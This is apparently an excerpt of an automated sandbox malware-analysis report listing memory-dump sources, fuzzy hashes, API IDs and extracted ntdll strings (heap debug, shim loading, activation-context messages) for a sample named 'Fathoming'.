                                          • Instruction ID: 7d1defc1734df18670a7af6af4cf0e71912836fb1fe3af2825aec970c94e90ce
                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction Fuzzy Hash: 36D0223331243197CF1886616910F636A09AF81AA0F0A002C340A93800C0198C43C2E0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Opcode Fuzzy Hash: 012fea600e08dff2379ae690614fc18faa7f657b2ab259cfff1d6c52de5404ec
                                          • Instruction Fuzzy Hash: F790022160540402D544B1585458706103557D0201F55D121A4028515DC6598B6677A2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9bd74aa6df3632364c5604db8fcca0c4ba93fa779347bf57980a43614213961
                                          • Instruction ID: 4b700c9ffc7755622c95a334cfc5f97211d12b75ad2d9f2f5ea01eb3326cb995
                                          • Opcode Fuzzy Hash: f9bd74aa6df3632364c5604db8fcca0c4ba93fa779347bf57980a43614213961
                                          • Instruction Fuzzy Hash: FC90023120140842D504B1584444B46102557E0301F55C126A4128615DC615C9627622
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da2c10df8864c45344c01dcaf770b41fe0517d6bc337ad5592dc4785975b02a7
                                          • Instruction ID: 05aa00dfcb4e6e0a5cd74382d3544905e5a925f15f865e35c8990f5414b3a2e0
                                          • Opcode Fuzzy Hash: da2c10df8864c45344c01dcaf770b41fe0517d6bc337ad5592dc4785975b02a7
                                          • Instruction Fuzzy Hash: A9900221601400424544B168888490650257BE1211755C231A499C511DC55989766766
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf58814698a7319aac9d28816eace19c5cae99707c7e336d390d8523acce9954
                                          • Instruction ID: 75f5b105935e98ca5e91bdacd0c4f9b191fa96c05c3925e9b2b729a693c133d9
                                          • Opcode Fuzzy Hash: cf58814698a7319aac9d28816eace19c5cae99707c7e336d390d8523acce9954
                                          • Instruction Fuzzy Hash: 3B90023120180402D504B1584848747102557D0302F55C121A9168516EC665C9A27632
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff195cba18970802d39174af56009a333c1f94507c043421b428f04d1577a7e2
                                          • Instruction ID: 1e466d61a7d7702e3f80c93129870cb840abd48406743149bc978c3dd58c0d75
                                          • Opcode Fuzzy Hash: ff195cba18970802d39174af56009a333c1f94507c043421b428f04d1577a7e2
                                          • Instruction Fuzzy Hash: 5F90023120180402D504B158485470B102557D0302F55C121A5168516DC62589627672
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a454582dfb280504ca69593c5bc5628f9dc862d2ac5368b4109fe7d2416b31da
                                          • Instruction ID: ee32cc2d1fa10bc29aea11840dd9edeb75534e5d74853abc21eb0e59fe46cdf9
                                          • Opcode Fuzzy Hash: a454582dfb280504ca69593c5bc5628f9dc862d2ac5368b4109fe7d2416b31da
                                          • Instruction Fuzzy Hash: E2900221211C0042D604B5684C54B07102557D0303F55C225A4158515CC91589726622
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 720463682ca429307d00860f732c27e410ab92b56543a0aaea93b615c070afd4
                                          • Instruction ID: 6c0b331867ca2ac7391de0321be452b493cf6b4c6936a9562e662798a77128fe
                                          • Opcode Fuzzy Hash: 720463682ca429307d00860f732c27e410ab92b56543a0aaea93b615c070afd4
                                          • Instruction Fuzzy Hash: B290026134140442D504B1584454B06102597E1301F55C125E5068515DC619CD637227
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47a5a9a1960164a76d9632500ef3627788058aa0fc6573e56b0ddefcfbd86100
                                          • Instruction ID: c9a4093979d292288294adb54c3b578f729545548c66ef9bd9cc1e04b630aa2c
                                          • Opcode Fuzzy Hash: 47a5a9a1960164a76d9632500ef3627788058aa0fc6573e56b0ddefcfbd86100
                                          • Instruction Fuzzy Hash: B990026121140042D508B1584444706106557E1201F55C122A6158515CC5298D726226
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac65b17dffae9265dd5fe9a747d989414190c758665f14c4e07a3fb4747c4ab4
                                          • Instruction ID: d006003f598dad94aacda8b7fca1d0059fdaca4590579f178d759d01af401468
                                          • Opcode Fuzzy Hash: ac65b17dffae9265dd5fe9a747d989414190c758665f14c4e07a3fb4747c4ab4
                                          • Instruction Fuzzy Hash: 3190027120140402D544B1584444746102557D0301F55C121A9068515EC6598EE67766
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 736dc35ba138981b9a48ab2f605141cb6df76a4d6f965f9180b4e9dd65a63412
                                          • Instruction ID: b65da52e3c13ba09f691221a1bb54d3ee8940012ae51133a86f0f50fe9a54275
                                          • Opcode Fuzzy Hash: 736dc35ba138981b9a48ab2f605141cb6df76a4d6f965f9180b4e9dd65a63412
                                          • Instruction Fuzzy Hash: 8A90022160140502D505B1584444616102A57D0241F95C132A5028516ECA258AA3B232
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 326d65ce3c928b3a5ff23fe0066e16de07deb691d13aebf7f16be499e5ec8cfd
                                          • Instruction ID: 4d9db01aaaf8dc5bc5258e4b320008d6ce7925977f7baa946d977093972b04d8
                                          • Opcode Fuzzy Hash: 326d65ce3c928b3a5ff23fe0066e16de07deb691d13aebf7f16be499e5ec8cfd
                                          • Instruction Fuzzy Hash: E290026120180403D544B5584844607102557D0302F55C121A6068516ECA298D627236
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe05e434398b5c32847b7b19d32f6d152dee6826b12c943daacd64990366c24
                                          • Instruction ID: b7c7188f2b59a7cd5786bd4b521f84746f5929c98ad32e6c8883dfd4055dcb43
                                          • Opcode Fuzzy Hash: abe05e434398b5c32847b7b19d32f6d152dee6826b12c943daacd64990366c24
                                          • Instruction Fuzzy Hash: F490022130140402D506B1584454606102997D1345F95C122E5428516DC6258A63B233
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dba48a716389eeb0e0128dbf22f2461639fd001858515cef95ecec4fec9b976b
                                          • Instruction ID: 568d5217bb25670daf5f9918b283f57b1955f34c885a7b07fe4b194c6fe7b07d
                                          • Opcode Fuzzy Hash: dba48a716389eeb0e0128dbf22f2461639fd001858515cef95ecec4fec9b976b
                                          • Instruction Fuzzy Hash: 0F90022124140802D544B1588454707102697D0601F55C121A4028515DC6168A7677B2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88191888c5219a852b0dd709f71c29f13f7c02154a93d52a9584458f8a546fd5
                                          • Instruction ID: d613846010f1fadc6d399aeb1fadc05b40ec07f2be986d6012ad2a6bd0246e7c
                                          • Opcode Fuzzy Hash: 88191888c5219a852b0dd709f71c29f13f7c02154a93d52a9584458f8a546fd5
                                          • Instruction Fuzzy Hash: 7A90022120184442D544B2584844B0F512557E1202F95C129A815A515CC91589666722
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 50388966041d070498c645f20343a002beb6ba087acc5644c4ce33ae0abbf577
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:

                                          Control-flow Graph (function starting at 21b22890; rendered graph and node list not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: c7285f6f684be477571becb211970b1c13faf43952cc93ec28490de593630678
                                          • Instruction ID: 1f1cb7c271e358ff15875454440717a523d313032723092ebb413f28e260589d
                                          • Opcode Fuzzy Hash: c7285f6f684be477571becb211970b1c13faf43952cc93ec28490de593630678
                                          • Instruction Fuzzy Hash: 1D510BB6E005567FCB19DFA8889097EFBB8FF493407508269E458D7245D374DF1887A0

                                          Control-flow Graph (function starting at 21b92410; rendered graph and node list not reproduced)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 9f37bf60923823346770b7905ed37f672abcf9dff9234337753374079b969233
                                          • Instruction ID: f6973e34edce39fd7c46c03b1faf9c4caf7615bf242a10dddae75fb45ed13941
                                          • Opcode Fuzzy Hash: 9f37bf60923823346770b7905ed37f672abcf9dff9234337753374079b969233
                                          • Instruction Fuzzy Hash: B851F8B5E00645AFDB28CF9DC89097FBBF8EF49200B0084B9E596D7682D674DB418B60

                                           Control-flow Graph
                                           (rendered as a graph image in the report; only the block list survives extraction) function at 21bba670, basic blocks 21bba670 through 21bba9a1; the entry block calls subroutine 21af2410 twice and RtlDebugPrintTimes, the common exit block (21bba89f-21bba8c4) calls 21af25b0 twice and 21b24c30, and RtlDebugPrintTimes is called from several further blocks.
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: e1ab84d796b82166710279783146144535b0fd9c10be2c329a724b474b2656b7
                                          • Instruction ID: 1a3cd23228f2ef74631cb1a7239d4ce0d325d38f6ff441dbd44af43156b294b3
                                          • Opcode Fuzzy Hash: e1ab84d796b82166710279783146144535b0fd9c10be2c329a724b474b2656b7
                                          • Instruction Fuzzy Hash: D5A18B75A042128FD709CE28C890A2ABBF5FF8A350F15456DED46DB721E770EE06CB91
                                          Strings
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 21B47AE6
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 21B479D0, 21B479F5
                                          • SsHd, xrefs: 21AFA3E4
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 21B479FA
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 21B479D5
                                          • Actx , xrefs: 21B47A0C, 21B47A73
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: 266c58dc5acd408780093b40d8c9fa8098aae1fa2c9aff4075a7370a29b7aaec
                                          • Instruction ID: 056316a50d77208a1ea9c4c410480d7b1e00d99c62e49e8d29976313d6154ceb
                                          • Opcode Fuzzy Hash: 266c58dc5acd408780093b40d8c9fa8098aae1fa2c9aff4075a7370a29b7aaec
                                          • Instruction Fuzzy Hash: 93E1D270A043428FD715CF24C894B9ABBF5FB85354F144A2DF9A6CB2A1D732DA45CB82
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: ca2cd5921ad549f00e15ea9d41b6d3f200654675ba01553832b574172d6a9902
                                          • Instruction ID: 1092b08778b6edb6e3ba167f4e2a84a157e6f55d71f762b2353dc0335fbd881e
                                          • Opcode Fuzzy Hash: ca2cd5921ad549f00e15ea9d41b6d3f200654675ba01553832b574172d6a9902
                                          • Instruction Fuzzy Hash: 75912532A01A82DFDB0ACF74C484A9EBBF1FF5AB14F16815DE544AB261DB35D940CB10
                                          Strings
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 21B39AB4
                                          • LdrpLoadShimEngine, xrefs: 21B39ABB, 21B39AFC
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 21B39AF6
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B39AC5, 21B39B06
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: 5f04e7a531405e617e28d3b994bbee29af754612392fecb182cdd53115862d7d
                                          • Instruction ID: a1ecb6012498266b5b06bd7e97bc3343653635bb4de6c15c9b6fff255a26486a
                                          • Opcode Fuzzy Hash: 5f04e7a531405e617e28d3b994bbee29af754612392fecb182cdd53115862d7d
                                          • Instruction Fuzzy Hash: C551E172A402599FDB0CDF6CC8A4EDD7BB6BF99304F05012AE954EB29ADB649C40C790
                                          Strings
                                          • ---------------------------------------, xrefs: 21B8F279
                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 21B8F263
                                          • HEAP: , xrefs: 21B8F15D
                                          • Entry Heap Size , xrefs: 21B8F26D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                          • API String ID: 3446177414-1102453626
                                          • Opcode ID: 6d2e75cbda054d93eb74b835b2e6e10fbe73f1df6af464f0af8d76374e1307b0
                                          • Instruction ID: 010927d1b4b0cbad21de9fe7f12ceb083e1cf4ff72901d76e8cf139129bdae40
                                          • Opcode Fuzzy Hash: 6d2e75cbda054d93eb74b835b2e6e10fbe73f1df6af464f0af8d76374e1307b0
                                          • Instruction Fuzzy Hash: 4141893AA00216DFCB0DDF59C598949BBF6FF4A75472681AEE4089B221D731ED42CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction ID: e37257cadf13211da8bcbe5b4b30ebbdb198e46ca73610b16e8eb57945ecfccc
                                          • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                          • Instruction Fuzzy Hash: CC0208715083419FD709CF28C490A6FBBF5EFD9700F008A6DB9998B664D731EA45CB92
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: a1e5990add3fab5dcab6fad43a14612a56479b5f77b1a39d59f4cd3376bfa661
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: D081B230A01A498EEF3DCF74C650BEDBBB1EF46350F14461DE858AB2A1CE7489488B51
                                           Memory Dump Source
                                           • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                           • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmp
                                           • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmp
